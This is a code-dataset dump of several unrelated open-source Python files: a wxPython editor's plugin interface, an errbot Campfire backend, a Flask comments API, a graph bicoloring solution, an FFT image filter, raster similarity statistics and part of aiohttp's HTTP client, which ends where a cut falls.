if open_file_dlg.ShowModal() == wx.ID_OK:
paths = open_file_dlg.GetPaths()
self.OpenFile(paths)
del open_file_dlg
def OpenFile(self, paths):
"""
OpenFile
Calls NewTab with the collected path.
Supports multiple path selection.
"""
# if paths is a list, open an StcContrel for each of them
if isinstance(paths, types.ListType):
for f in paths:
self.NewTab(0, os.path.split(f)[-1], f)
Log.AddLogEntry(self._ ("Opened file ") + f)
#if a string, open an StcControl for it
else:
self.NewTab(0, os.path.split(paths)[-1], paths)
Log.AddLogEntry(self._ ("Opened file ") + paths)
#notify general plugins
for t in self.general_plugins:
try: #insulate from possible plugin errors
self.general_plugins[t].NotifyDocumentOpened()
except: pass
AutoComp.UpdateCTagsFiles(self.id_range)
def SetStatus(self, event, text):
"""
ResetStatus
Sets the status of statusbar.
"""
self.status_bar.SetStatusText(text)
# event.Skip()
def ResetStatus(self, event):
"""
ResetStatus
Sets the status bar status to nothing.
"""
self.status_bar.SetStatusText("")
event.Skip()
def SaveAll(self, event):
"""
SaveAll
Saves all the current documents using the
objects Save function.
"""
for id in self.id_range:
cur_doc = wx.FindWindowById(id)
if cur_doc.GetFilePath() != "" and cur_doc.GetFilePath() != \
"New Document":
cur_doc.Save(0)
####################################################################
# PLUGIN INTERFACE #
####################################################################
def ToggleSidePanel(self, event):
pane = self.aui_manager.GetPane(self.side_notebook)
if pane.IsShown(): pane.Hide()
else: pane.Show()
self.aui_manager.Update()
def ToggleBottomPanel(self, event):
pane = self.aui_manager.GetPane(self.bottom_notebook)
if pane.IsShown(): pane.Hide()
else: pane.Show()
self.aui_manager.Update()
def GetCurrentDocument(self):
"""
GetCurrentDocument
Returns the selected active buffer object.
"""
try:
return wx.FindWindowById(self.id_range[self.nb.GetSelection()])
except IndexError:
return None
def GetAllDocuments(self):
"""
GetALlDocuments
Returns all existing buffers.
"""
docs = []
for d in self.id_range:
docs.append(wx.FindWindowById((d)))
return docs
def AddToMenuBar(self,label,menu):
"""
AddToMenuBar
@id The id of the new menu entry.
@label The label of the new menu entry.
@menu A wx.Menu object which will be added in the Plugins menu.
Adds a wx.Menu object to menubar.
"""
return self.menubar.plugins.AppendMenu(-1,label,menu)
def RemoveFromMenubar(self, menu):
"""
RemoveFromMenubar
Removes the supplied argument menu from the plugins submenu.
"""
self.menubar.plugins.RemoveItem(menu)
def BindMenubarEvent(self, item, function):
"""
BindMenuBarEvent
@item The menu entry object which to be bint.
@function The function the item to be bint to.
Binds a wx.EVT_MENU event to the suplied function.
"""
self.Bind(wx.EVT_MENU, function, id = item.GetId())
def GetBottomPanel(self):
"""
GetBottomPanel
Returns the lower notebook.
"""
return self.bottom_notebook
def AddToBottomPanel(self, panel, name):
"""
AddToBottomPanel
Adds the suplied panel to the lower notebook with tho supplied
name label.
"""
self.bottom_notebook.AddPage(panel, name)
def GetSidePanel(self):
"""
GetSidePanel
Returns the side notebook.
"""
return self.side_notebook
def AddToSidePanel(self, panel, name):
"""
AddToSidePanel
Adds the suplied panel to the side notebook with tho supplied
name label.
"""
self.side_notebook.AddPage(panel, name)
def DeleteBottomPage(self, name):
"""
DeleteBottomPage
Deletes the tab named name from the lower notebook.
"""
self.bottom_notebook.DeletePage(Config.GetTab(name,
self.bottom_notebook))
def DeleteSidePage(self, name):
"""
DeleteSidePage
Deletes the tab named name from the side notebook.
"""
self.side_notebook.DeletePage(Config.GetTab(name,
self.side_notebook))
def AddPaneToAui(self, widget ,pane_info):
"""
"AddPaneToAui
@widget the widget to be added
@pane needs to be an AuiPaneInfo object.
Adds the pane to the aui manager.
"""
self.aui_manager.AddPane(widget, pane_info)
def AddToolbarToAui(self, toolbar, pane_info):
"""
AddToosbartoAui
@toolbar the wx.Toolbar object
@pane_info needs to be a wx.AuiPaneInfo object with it's name and caption
defined.
"""
self.aui_manager.AddPane(toolbar, pane_info.ToolbarPane().Top().CloseButton(False))
def GetAuiManager(self):
"""
GetAuiManager
Returns the AuiManager that is responsable for window layout.
"""
return self.aui_manager
def GetTabManager(self):
"""
GetTabManager
Returns the AuiNoteBook that is resposible for tabs management.
"""
return self.nb
def CreateNewDocument(self, name):
"""
CreateNewDocument
@name a string to be given to the new document as a name.
Creates a new empty document.
Returns a reference to the now StcControl
"""
return self.NewTab(0, name, "")
def main():
app = wx.PySimpleApp()
frame = gEcrit(parent=None, id=-1)
frame.Show()
app.MainLoop()
if __name__ == '__main__':
main()
| gpl-3.0 | 6,744,079,877,106,836,000 | 35.32797 | 204 | 0.581746 | false |
bolshoibooze/err | errbot/backends/campfire.py | 1 | 4381 | import logging
import sys
from errbot.backends.base import Message, build_message
from errbot.errBot import ErrBot
from threading import Condition
log = logging.getLogger(__name__)
try:
import pyfire
except ImportError:
log.exception("Could not start the campfire backend")
log.fatal("""
If you intend to use the campfire backend please install pyfire:
pip install pyfire
""")
sys.exit(-1)
class CampfireConnection(pyfire.Campfire):
rooms = {} # keep track of joined room so we can send messages directly to them
def join_room(self, name, msg_callback, error_callback):
room = self.get_room_by_name(name)
room.join()
stream = room.get_stream(error_callback=error_callback)
stream.attach(msg_callback).start()
self.rooms[name] = (room, stream)
ENCODING_INPUT = sys.stdin.encoding
class CampfireIdentifier(object):
def __init__(self, user):
self._user = user # it is just one room for the moment
@property
def user(self):
return self._user
class CampfireBackend(ErrBot):
exit_lock = Condition()
def __init__(self, config):
super(CampfireBackend, self).__init__(config)
identity = config.BOT_IDENTITY
self.conn = None
self.subdomain = identity['subdomain']
self.username = identity['username']
self.password = identity['password']
if not hasattr(config, 'CHATROOM_PRESENCE') or len(config['CHATROOM_PRESENCE']) < 1:
raise Exception('Your bot needs to join at least one room, please set'
' CHATROOM_PRESENCE with at least a room in your config')
self.chatroom = config.CHATROOM_PRESENCE[0]
self.room = None
self.ssl = identity['ssl'] if 'ssl' in identity else True
self.bot_identifier = None
def send_message(self, mess):
super(CampfireBackend, self).send_message(mess)
self.room.speak(mess.body) # Basic text support for the moment
def serve_forever(self):
self.exit_lock.acquire()
self.connect() # be sure we are "connected" before the first command
self.connect_callback() # notify that the connection occured
try:
log.info("Campfire connected.")
self.exit_lock.wait()
except KeyboardInterrupt:
pass
finally:
self.exit_lock.release()
self.disconnect_callback()
self.shutdown()
def connect(self):
if not self.conn:
self.conn = CampfireConnection(self.subdomain, self.username, self.password, self.ssl)
self.bot_identifier = self.build_identifier(self.username)
self.room = self.conn.get_room_by_name(self.chatroom).name
# put us by default in the first room
# resource emulates the XMPP behavior in chatrooms
return self.conn
def build_message(self, text):
return Message(text, type_='groupchat') # it is always a groupchat in campfire
def shutdown(self):
super(CampfireBackend, self).shutdown()
def msg_callback(self, message):
log.debug('Incoming message [%s]' % message)
user = ""
if message.user:
user = message.user.name
if message.is_text():
msg = Message(message.body, type_='groupchat') # it is always a groupchat in campfire
msg.frm = CampfireIdentifier(user)
msg.to = self.bot_identifier # assume it is for me
self.callback_message(msg)
def error_callback(self, error, room):
log.error("Stream STOPPED due to ERROR: %s in room %s" % (error, room))
self.exit_lock.acquire()
self.exit_lock.notify()
self.exit_lock.release()
def join_room(self, room, username=None, password=None):
self.conn.join_room(room, self.msg_callback, self.error_callback)
def build_message(self, text):
return build_message(text, Message)
def build_identifier(self, strrep):
return CampfireIdentifier(strrep)
def send_simple_reply(self, mess, text, private=False):
"""Total hack to avoid stripping of rooms"""
self.send_message(self.build_reply(mess, text, True))
@property
def mode(self):
return 'campfire'
def groupchat_reply_format(self):
return '@{0} {1}'
| gpl-3.0 | -7,363,828,428,747,781,000 | 32.7 | 98 | 0.632276 | false |
EOOOL/flaskq | app/api_1_0/comments.py | 1 | 2405 | from flask import jsonify, request, g, url_for, current_app
from .. import db
from ..models import Post, Permission, Comment
from . import api
from .decorators import permission_required
@api.route('/comments/')
def get_comments():
page = request.args.get('page', 1, type=int)
pagination = Comment.query.order_by(Comment.timestamp.desc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_comments', page=page-1, _external=True)
next = None
if pagination.has_next:
next = url_for('api.get_comments', page=page+1, _external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/comments/<int:id>')
def get_comment(id):
comment = Comment.query.get_or_404(id)
return jsonify(comment.to_json())
@api.route('/posts/<int:id>/comments/')
def get_post_comments(id):
post = Post.query.get_or_404(id)
page = request.args.get('page', 1, type=int)
pagination = post.comments.order_by(Comment.timestamp.asc()).paginate(
page, per_page=current_app.config['FLASKY_COMMENTS_PER_PAGE'],
error_out=False)
comments = pagination.items
prev = None
if pagination.has_prev:
prev = url_for('api.get_post_comments', id=id, page=page-1,
_external=True)
next = None
if pagination.has_next:
next = url_for('api.get_post_comments', id=id, page=page+1,
_external=True)
return jsonify({
'comments': [comment.to_json() for comment in comments],
'prev': prev,
'next': next,
'count': pagination.total
})
@api.route('/posts/<int:id>/comments/', methods=['POST'])
@permission_required(Permission.COMMENT)
def new_post_comment(id):
post = Post.query.get_or_404(id)
comment = Comment.from_json(request.json)
comment.author = g.current_user
comment.post = post
db.session.add(comment)
db.session.commit()
return jsonify(comment.to_json()), 201, \
{'Location': url_for('api.get_comment', id=comment.id,
_external=True)}
| mit | 1,175,486,497,100,385,800 | 32.357143 | 75 | 0.607484 | false |
secnot/uva-onlinejudge-solutions | 10004 - Bicoloring/main.py | 1 | 1734 | import sys
from collections import deque
def load_num():
num_str = sys.stdin.readline()
if num_str == '\n' or num_str=='':
return None
return list(map(int, num_str.rstrip().split()))
def load_graph():
"""Load graph into its adjacency list"""
vertices = load_num()[0]
# Check it is a valid graph and not the end of the file
if vertices==0:
return None
# Load each edge an construct adjcency list
edges = load_num()[0]
adjList = [list() for v in range(vertices)]
for i in range(edges):
s, e = load_num()
adjList[s].append(e)
adjList[e].append(s)
return adjList
def is_bicolored(adjList):
"""Use BFS, when the edges of a vertex are processed:
* If the vertex found is new assign a color opposite to current.
* If the vertex was already processed and has same color to current
the graph is not bicolored
"""
vertices = len(adjList)
discovered = [False for x in range(vertices)]
processed = [False for x in range(vertices)]
color = [-1 for x in range(vertices)]
q = deque([0])
color[0] = 0
while q:
v = q.popleft()
processed[v] = True
for n in adjList[v]:
if not discovered[n]:
discovered[n] = True
color[n] = 0 if color[v] else 1
q.append(n)
elif color[n]==color[v]:
return False
return True
if __name__ == '__main__':
while True:
adj = load_graph()
if not adj:
break
if is_bicolored(adj):
print("BICOLORABLE.")
else:
print("NOT BICOLORABLE.")
exit(0)
| mit | -2,551,883,087,197,521,400 | 20.949367 | 76 | 0.544983 | false |
beremaran/cbu-cse3113 | hw07.py | 1 | 2388 | #!/usr/bin/env python
import argparse
import numpy as np
from PIL import Image
'''
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
'''
Berke Emrecan Arslan <[email protected]>
140315025
Faculty of Engineering, Computer Science & Engineering
Manisa Celal Bayar University
Taken from;
https://github.com/beremaran/cbu-cse3113
'''
def im_load(img_path):
im = Image.open(img_path)
im = im.convert('L')
return np.asarray(im, dtype=np.uint8)
def im_center(im):
return np.asarray(im.shape) / 2
def im_r(im, coordinates=(0, 0)):
return np.linalg.norm(im_center(im) - coordinates)
def im_r_max(im):
return im_r(im, np.zeros((2,)))
def im_filter(im, filter_type, filter_gain):
r = im_r_max(im) * filter_gain
center = im_center(im)
y, x = np.ogrid[:im.shape[0], :im.shape[1]]
k = 1 if filter_type == "lowpass" else -1
return -1 * k * np.sqrt((y - center[0]) ** 2 + (x - center[1]) ** 2) >= r * k * -1
def run(img_path, filter_type="lowpass", filter_gain=0.1):
im = im_load(img_path)
f = np.fft.fft2(im)
f = np.fft.fftshift(f)
f[~im_filter(f, filter_type, filter_gain)] = 1
f = np.fft.ifftshift(f)
f = np.fft.ifft2(f)
f = abs(f)
Image.fromarray(f.astype(np.uint8)).save("140315025HW07.png", "PNG")
if __name__ == "__main__":
argparser = argparse.ArgumentParser("140315025HW07.py", description="Low-pass or high-pass filtering for images")
argparser.add_argument("image_path", help="Image to be filtered")
argparser.add_argument("filter_type", choices=["lowpass", "highpass"], help="Filter type")
argparser.add_argument("gain", type=float, help="Filter's gain")
args = argparser.parse_args()
run(args.image_path, args.filter_type, args.gain)
| gpl-3.0 | -3,285,391,032,930,099,700 | 27.771084 | 117 | 0.664154 | false |
VUEG/bdes_to | src/03_post_processing/similarity.py | 1 | 18175 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" Functions and utilities comparing raster and vector similarities.
Module can be used alone or as part of Snakemake workflow.
"""
import logging
import rasterio
import geopandas as gpd
import pandas as pd
import numpy as np
import numpy.ma as ma
from importlib.machinery import SourceFileLoader
from scipy.spatial.distance import jaccard
from scipy.stats import kendalltau
from timeit import default_timer as timer
utils = SourceFileLoader("lib.utils", "src/00_lib/utils.py").load_module()
def compute_jaccard(x, y, x_min=0.0, x_max=1.0, y_min=0.0, y_max=1.0,
warn_uneven=True, limit_tolerance=4, disable_checks=False):
"""Calculate the Jaccard index (Jaccard similarity coefficient).
The Jaccard coefficient measures similarity between sample sets, and is
defined as the size of the intersection divided by the size of the union of
the sample sets. The Jaccard coefficient can be calculated for a subset of
rasters provided by using the threshold argument.
Min and max values must be provided for both RasterLayer objects x
and y. Method can be used with RasterLayers of any value range, but
the defaults [0.0, 1.0] are geared towards comparing Zonation rank priority
rasters. Limits provided are inclusive.
:param x ndarray object.
:param y ndarray object.
:param x_min Numeric minimum threshold value for x to be used
(default 0.0).
:param x_max Numeric maximum threshold value for x to be used
(default 1.0).
:param y_min Numeric minimum threshold value for y to be used
(default 0.0).
:param y_max Numeric maximum threshold value for y to be used
(default 1.0).
:param warn_uneven Boolean indicating whether a warning is raised if the
compared raster coverages are very (>20x) uneven.
:param limit_tolerance integer values that defines to which precision x and
y limits are rounded to. This helps e.g. with values
that close to 0 but not quite 0 (default: 4, i.e.
round(x, 4)).
:param disable_checks boolean indicating if the input limit values are
checked against the actual raster values in x and y.
:return numeric value in [0, 1].
"""
if not disable_checks:
assert x_min >= np.round(np.min(x), limit_tolerance), "Min threshold smaller than computed min of x"
assert x_max <= np.round(np.max(x), limit_tolerance), "Max threshold greater than computed max of x"
assert x_min < x_max, "Min threshold for x larger to max threshold"
assert y_min >= np.round(np.min(y), limit_tolerance), "Min threshold smaller than computed min of y"
assert y_max <= np.round(np.max(y), limit_tolerance), "Max threshold greater than computed max of y"
assert y_min < y_max, "Min threshold for y larger to max threshold"
# Get the values according to the limits provided
x_bin = (x >= x_min) & (x <= x_max)
y_bin = (y >= y_min) & (y <= y_max)
if warn_uneven:
x_size = np.sum(x_bin)
y_size = np.sum(y_bin)
# Sort from smaller to larger
sizes = np.sort([x_size, y_size])
if sizes[1] / sizes[0] > 20:
print("WARNING: The extents of raster values above the "
"threshhold differ more than 20-fold: Jaccard coefficient " +
"may not be informative.")
# Compute the Jaccard-Needham dissimilarity between two boolean 1-D arrays
# and subtract from 1 to get the Jaccard index
return 1 - jaccard(x_bin.flatten(), y_bin.flatten())
def cross_correlation(input_rasters, verbose=False, logger=None):
""" Calculate Kendall tau rank correlation between all the inpur rasters.
Input rasters are read in as masked arrays and all cells that are NoData
are discarded. This way, only the values of informative cells are passed
on to scipy.stats.kendalltau() which makes things faster. The assumption is
that all rasters exactly match on which cells have values. An intersection
of both rasters' masks is used to define informative cells.
:param input_rasters list of input raster paths.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return Pandas Dataframe with rank correlation information.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_correlation')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING KENDALL TAU RANK CORRELATIONS **]")
all_correlations = pd.DataFrame({"feature1": [], "feature2": [],
"tau": [], "pvalue": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2)
no_computation = 1
for i in range(0, n_rasters):
raster1 = rasterio.open(input_rasters[i])
raster1_src = raster1.read(1, masked=True)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_src = raster2.read(1, masked=True)
# Compute the intersection of the masks of both rasters and use
# that as a value mask.
value_mask = raster1_src.mask & raster2_src.mask
# Then set the mask of both raster to the intersection mask
raster1_src.mask = value_mask
raster2_src.mask = value_mask
# Inlude only cells with actual values
raster1_values = ma.compressed(raster1_src)
raster2_values = ma.compressed(raster2_src)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating correlation ".format(prefix) +
"between {} ".format(input_rasters[i]) +
"and {}".format(input_rasters[j])))
# Compute Kendall's tau rank correlation
tau, pvalue = kendalltau(raster1_values, raster2_values)
llogger.debug("Tau: {0} (p-value: {1})".format(tau, pvalue))
correlations = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"tau": [tau],
"pvalue": [pvalue]})
all_correlations = pd.concat([all_correlations, correlations])
no_computation += 1
all_correlations.index = np.arange(0, len(all_correlations.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_correlations
def cross_jaccard(input_rasters, thresholds, verbose=False, logger=None):
""" Calculate Jaccard coefficients between all the inpur rasters.
This is a utility function that is intented to be used to compare
fractions of the landscape.
:param input_rasters list of input raster paths.
:param thresholds vector of numeric tuples (x_min, x_max, y_min, y_max) values of thresholds.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:param ... additional arguments passed on to jaccard().
:return Pandas Dataframe with Jaccard coefficients between all rasters.
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_jaccard')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_rasters) > 1, "More than one input rasters are needed"
assert len(thresholds) >= 1, "At least one tuple of thresholds is needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING JACCARD INDICES **]")
all_jaccards = pd.DataFrame({"feature1": [], "feature2": [],
"threshold": [], "coef": []})
n_rasters = len(input_rasters)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_rasters * n_rasters - n_rasters) / 2 * len(thresholds))
no_computation = 1
for threshold in thresholds:
if len(threshold) != 4:
llogger.error("Threshold tuple needs 4 values")
next
for i in range(0, n_rasters):
x_min, x_max, y_min, y_max = threshold
raster1 = rasterio.open(input_rasters[i])
# To calculate the Jaccard index we are dealing with binary data
# only. Avoid using masked arrays and replace NoData values with
# zeros.
raster1_nodata = raster1.nodata
raster1_src = raster1.read(1)
np.place(raster1_src, np.isclose(raster1_src, raster1_nodata), 0.0)
for j in range(i+1, n_rasters):
raster2 = rasterio.open(input_rasters[j])
raster2_nodata = raster2.nodata
raster2_src = raster2.read(1)
np.place(raster2_src, np.isclose(raster2_src, raster2_nodata),
0.0)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating Jaccard ".format(prefix) +
"index for [{0}, {1}] ".format(x_min, x_max) +
"in {} ".format(input_rasters[i]) +
"and, [{0}, {1}] ".format(y_min, y_max) +
"in {}".format(input_rasters[j])))
coef = compute_jaccard(raster1_src, raster2_src,
x_min=x_min, x_max=x_max,
y_min=y_min, y_max=y_max)
jaccards = pd.DataFrame({"feature1": [input_rasters[i]],
"feature2": [input_rasters[j]],
"threshold": [threshold],
"coef": [coef]})
all_jaccards = pd.concat([all_jaccards, jaccards])
no_computation += 1
all_jaccards.index = np.arange(0, len(all_jaccards.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_jaccards
def compute_mcs(a, b):
""" Compute MCS between vectors a and b.
:param a numeric vector.
:param b numeric vector.
:return ndarray of computed MCS scores.
"""
assert len(a) == len(b), "Vectors a and b must be of same length"
N = len(a)
# Create an array filled with -1s to store the MCS.
mcs = 0
nans = False
for i in range(0, N):
if np.isnan(a[i]) or np.isnan(b[i]):
nans = True
else:
# If eiher a or b is 0, do nothing as division would fail
if a[i] == 0.0 or b[i] == 0.0:
pass
else:
abs_subs = np.abs(a[i] - b[i]) / np.max([a[i], b[i]])
mcs += abs_subs
if nans:
print("WARNING: a and/or b contain NaNs")
return mcs / N
def cross_mcs(input_vectors, value_fields, verbose=False, logger=None):
""" Compute map comparison statistics between input vector features.
MCS (Map Comparison Statistic) indicates the average difference between any
pair of feature polygon values, expressed as a fraction of the highest
value. MCS is calculated between each polygon in the input vector features
and it is required (and checked) that all the inputs are based on the
same vector feature.
For another application of MCS, see:
Schulp, C. J. E., Burkhard, B., Maes, J., Van Vliet, J., & Verburg, P. H.
(2014). Uncertainties in Ecosystem Service Maps: A Comparison on the
European Scale. PLoS ONE, 9(10), e109643.
http://doi.org/10.1371/journal.pone.0109643
:param input_vectors list of input vector paths.
:param value_field list of String names indicating which fields contains
the values to be compared.
:param verbose: Boolean indicating how much information is printed out.
:param logger: logger object to be used.
:return list of GeoPandas Dataframe with MCS between all rasters in field
"mcs".
"""
# 1. Setup --------------------------------------------------------------
all_start = timer()
if not logger:
logging.basicConfig()
llogger = logging.getLogger('cross_mcs')
llogger.setLevel(logging.DEBUG if verbose else logging.INFO)
else:
llogger = logger
# Check the inputs
assert len(input_vectors) > 1, "More than one input vector needed"
assert len(value_fields) == len(input_vectors), "One value field per vector feature needed"
# 2. Calculations --------------------------------------------------------
llogger.info(" [** COMPUTING MCS SCORES **]")
all_mcs = pd.DataFrame({"feature1": [], "feature2": [],
"mcs": []})
n_vectors = len(input_vectors)
# Generate counter information for all the computations. The results
# matrix is always diagonally symmetrical.
n_computations = int((n_vectors * n_vectors - n_vectors) / 2)
no_computation = 1
for i in range(0, n_vectors):
# Read in the data as a GeoPandas dataframe
vector1_path = input_vectors[i]
vector1 = gpd.read_file(vector1_path)
for j in range(i+1, n_vectors):
vector2_path = input_vectors[j]
vector2 = gpd.read_file(vector2_path)
prefix = utils.get_iteration_prefix(no_computation,
n_computations)
llogger.info(("{} Calculating MCS ".format(prefix) +
"between {} ".format(vector1_path) +
"and {}".format(vector2_path)))
a = vector1[value_fields[i]]
b = vector2[value_fields[j]]
mcs_value = compute_mcs(a, b)
mcs = pd.DataFrame({"feature1": [vector1_path],
"feature2": [vector2_path],
"mcs": [mcs_value]})
all_mcs = pd.concat([all_mcs, mcs])
no_computation += 1
all_mcs.index = np.arange(0, len(all_mcs.index), 1)
all_end = timer()
all_elapsed = round(all_end - all_start, 2)
llogger.info(" [TIME] All processing took {} sec".format(all_elapsed))
return all_mcs
def plu_variation(input_files, input_codes, logger=None):
""" Compute per planning unit (PLU) variation statistics.
Given a list of input features describing the same planinng units,
calculate statistics based on defined field names.
:param input_files: String list of paths to input (vector) features.
:param input_codes: String list of field names corresponding to each
input feature. The statistics will calculated based on
these fields.
:param logger: Logger object.
:return: GeoPandas DataFrame object.
"""
# Set up logging
if not logger:
logging.basicConfig()
llogger = logging.getLogger('plu_variation')
llogger.setLevel(logging.INFO)
else:
llogger = logger
n_features = len(input_files)
# Create an empty DataFrame to store the rank priority cols
rank_values = pd.DataFrame({'NUTS_ID': []})
llogger.info("[1/2] Reading in {} features...".format(n_features))
for i, feature_file in enumerate(input_files):
feature_code = input_codes[i]
prefix = utils.get_iteration_prefix(i+1, n_features)
llogger.debug("{0} Processing feature {1}".format(prefix,
feature_file))
# Read in the feature as GeoPandas dataframe
feat_data = gpd.read_file(feature_file)
# Two different field names are used to store the mean rank
# information: "_mean" for geojson-files and 'Men_rnk' for
# shapefiles. Figure out which is currently used.
if '_mean' in feat_data.columns:
mean_field = '_mean'
elif 'Men_rnk' in feat_data.columns:
mean_field = 'Men_rnk'
else:
llogger.error("Field '_mean' or 'Men_rnk' not found")
raise ValueError
# On first iteration, also get the NUTS_ID column
if i == 1:
rank_values['NUTS_ID'] = feat_data['NUTS_ID']
# Get the rank priority column and place if the store DataFrame
rank_values[feature_code] = feat_data[mean_field]
llogger.info("[2/2] Calculating mean and STD...")
# Read in the first input feature to act as a template.
output_feature = gpd.read_file(input_files[0])
# Only take one field: NUTS_ID
output_feature = output_feature[['geometry', 'NUTS_ID']]
# Merge with the collected data
output_feature = output_feature.merge(rank_values, on='NUTS_ID')
# Calculate mean
agg_means = output_feature.mean(1)
# Calculate STD
agg_stds = output_feature.std(1)
output_feature['agg_mean'] = agg_means
output_feature['agg_std'] = agg_stds
return output_feature
| mit | -3,889,173,436,250,582,000 | 41.169374 | 108 | 0.592737 | false |
jashandeep-sohi/aiohttp | aiohttp/client.py | 1 | 25360 | """HTTP Client for asyncio."""
import asyncio
import base64
import hashlib
import os
import sys
import traceback
import warnings
import http.cookies
import urllib.parse
import aiohttp
from .client_reqrep import ClientRequest, ClientResponse
from .errors import WSServerHandshakeError
from .multidict import MultiDictProxy, MultiDict, CIMultiDict, upstr
from .websocket import WS_KEY, WebSocketParser, WebSocketWriter
from .websocket_client import ClientWebSocketResponse
from . import hdrs
__all__ = ('ClientSession', 'request', 'get', 'options', 'head',
'delete', 'post', 'put', 'patch', 'ws_connect')
PY_35 = sys.version_info >= (3, 5)
class ClientSession:
"""First-class interface for making HTTP requests."""
_source_traceback = None
_connector = None
def __init__(self, *, connector=None, loop=None, cookies=None,
headers=None, skip_auto_headers=None,
auth=None, request_class=ClientRequest,
response_class=ClientResponse,
ws_response_class=ClientWebSocketResponse,
version=aiohttp.HttpVersion11):
if connector is None:
connector = aiohttp.TCPConnector(loop=loop)
loop = connector._loop # never None
else:
if loop is None:
loop = connector._loop # never None
elif connector._loop is not loop:
raise ValueError("loop argument must agree with connector")
self._loop = loop
if loop.get_debug():
self._source_traceback = traceback.extract_stack(sys._getframe(1))
self._cookies = http.cookies.SimpleCookie()
# For Backward compatability with `share_cookies` connectors
if connector._share_cookies:
self._update_cookies(connector.cookies)
if cookies is not None:
self._update_cookies(cookies)
self._connector = connector
self._default_auth = auth
self._version = version
# Convert to list of tuples
if headers:
headers = CIMultiDict(headers)
else:
headers = CIMultiDict()
self._default_headers = headers
if skip_auto_headers is not None:
self._skip_auto_headers = frozenset([upstr(i)
for i in skip_auto_headers])
else:
self._skip_auto_headers = frozenset()
self._request_class = request_class
self._response_class = response_class
self._ws_response_class = ws_response_class
def __del__(self, _warnings=warnings):
if not self.closed:
self.close()
_warnings.warn("Unclosed client session {!r}".format(self),
ResourceWarning)
context = {'client_session': self,
'message': 'Unclosed client session'}
if self._source_traceback is not None:
context['source_traceback'] = self._source_traceback
self._loop.call_exception_handler(context)
def request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
"""Perform HTTP request."""
return _RequestContextManager(
self._request(
method,
url,
params=params,
data=data,
headers=headers,
skip_auto_headers=skip_auto_headers,
auth=auth,
allow_redirects=allow_redirects,
max_redirects=max_redirects,
encoding=encoding,
version=version,
compress=compress,
chunked=chunked,
expect100=expect100,
read_until_eof=read_until_eof))
@asyncio.coroutine
def _request(self, method, url, *,
params=None,
data=None,
headers=None,
skip_auto_headers=None,
auth=None,
allow_redirects=True,
max_redirects=10,
encoding='utf-8',
version=None,
compress=None,
chunked=None,
expect100=False,
read_until_eof=True):
if version is not None:
warnings.warn("HTTP version should be specified "
"by ClientSession constructor", DeprecationWarning)
else:
version = self._version
if self.closed:
raise RuntimeError('Session is closed')
redirects = 0
history = []
if not isinstance(method, upstr):
method = upstr(method)
# Merge with default headers and transform to CIMultiDict
headers = self._prepare_headers(headers)
if auth is None:
auth = self._default_auth
# It would be confusing if we support explicit Authorization header
# with `auth` argument
if (headers is not None and
auth is not None and
hdrs.AUTHORIZATION in headers):
raise ValueError("Can't combine `Authorization` header with "
"`auth` argument")
skip_headers = set(self._skip_auto_headers)
if skip_auto_headers is not None:
for i in skip_auto_headers:
skip_headers.add(upstr(i))
while True:
req = self._request_class(
method, url, params=params, headers=headers,
skip_auto_headers=skip_headers, data=data,
cookies=self.cookies, encoding=encoding,
auth=auth, version=version, compress=compress, chunked=chunked,
expect100=expect100,
loop=self._loop, response_class=self._response_class)
conn = yield from self._connector.connect(req)
try:
resp = req.send(conn.writer, conn.reader)
try:
yield from resp.start(conn, read_until_eof)
except:
resp.close()
conn.close()
raise
except (aiohttp.HttpProcessingError,
aiohttp.ServerDisconnectedError) as exc:
raise aiohttp.ClientResponseError() from exc
except OSError as exc:
raise aiohttp.ClientOSError(*exc.args) from exc
self._update_cookies(resp.cookies)
# For Backward compatability with `share_cookie` connectors
if self._connector._share_cookies:
self._connector.update_cookies(resp.cookies)
# redirects
if resp.status in (301, 302, 303, 307) and allow_redirects:
redirects += 1
history.append(resp)
if max_redirects and redirects >= max_redirects:
resp.close()
break
else:
# TODO: close the connection if BODY is large enough
# Redirect with big BODY is forbidden by HTTP protocol
# but malformed server may send illegal response.
# Small BODIES with text like "Not Found" are still
# perfectly fine and should be accepted.
yield from resp.release()
# For 301 and 302, mimic IE behaviour, now changed in RFC.
